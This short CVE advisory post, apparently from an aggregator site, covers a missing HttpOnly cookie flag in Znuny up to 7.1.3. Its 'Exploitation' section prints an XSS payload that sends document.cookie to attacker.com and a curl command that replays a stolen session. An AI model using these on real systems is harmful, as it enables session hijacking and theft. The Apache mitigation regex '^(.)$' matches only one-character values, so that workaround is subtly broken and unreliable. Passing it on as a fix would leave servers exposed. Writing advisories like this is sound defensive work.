Listen to this Post
How CVE-2025-26844 Works
CVE-2025-26844 affects Znuny up to version 7.1.3 by failing to set the `HttpOnly` flag on session cookies. This allows attackers to steal cookies via Cross-Site Scripting (XSS) attacks since client-side scripts can access unprotected cookies. Without HttpOnly, sensitive session tokens remain exposed, increasing the risk of session hijacking. The vulnerability stems from improper cookie configuration in the application’s session management.
DailyCVE Form
Platform: Znuny
Version: ≤ 7.1.3
Vulnerability: Missing HttpOnly
Severity: Medium
Date: 06/12/2025
Prediction: Patch by 08/2025
What Undercode Say:
Exploitation
1. XSS Attack Vector:
document.write('<img src="http://attacker.com/steal?cookie=' + document.cookie + '">');
2. Session Hijacking:
curl -H "Cookie: stolen_session=XYZ" http://victim-znuny/dashboard
Protection
1. Manual Patch:
In Znuny's session config:
$Self->{HttpOnly} = 1;
2. Nginx Mitigation:
proxy_cookie_path / "/; HttpOnly; Secure";
3. Apache Mitigation:
Header edit Set-Cookie ^(.)$ "$1; HttpOnly; Secure"
Detection
1. Cookie Audit:
curl -I http://znuny-instance.com | grep -i set-cookie
2. Automated Scan:
nmap --script http-security-headers -p 443 znuny-instance.com
Analytics
- CVSS: 5.4 (Medium)
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: Required (XSS)
Expected Patch
- Vendor Fix: Enforce `HttpOnly` in default cookie settings.
- Workaround: Apply reverse proxy cookie modifications.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
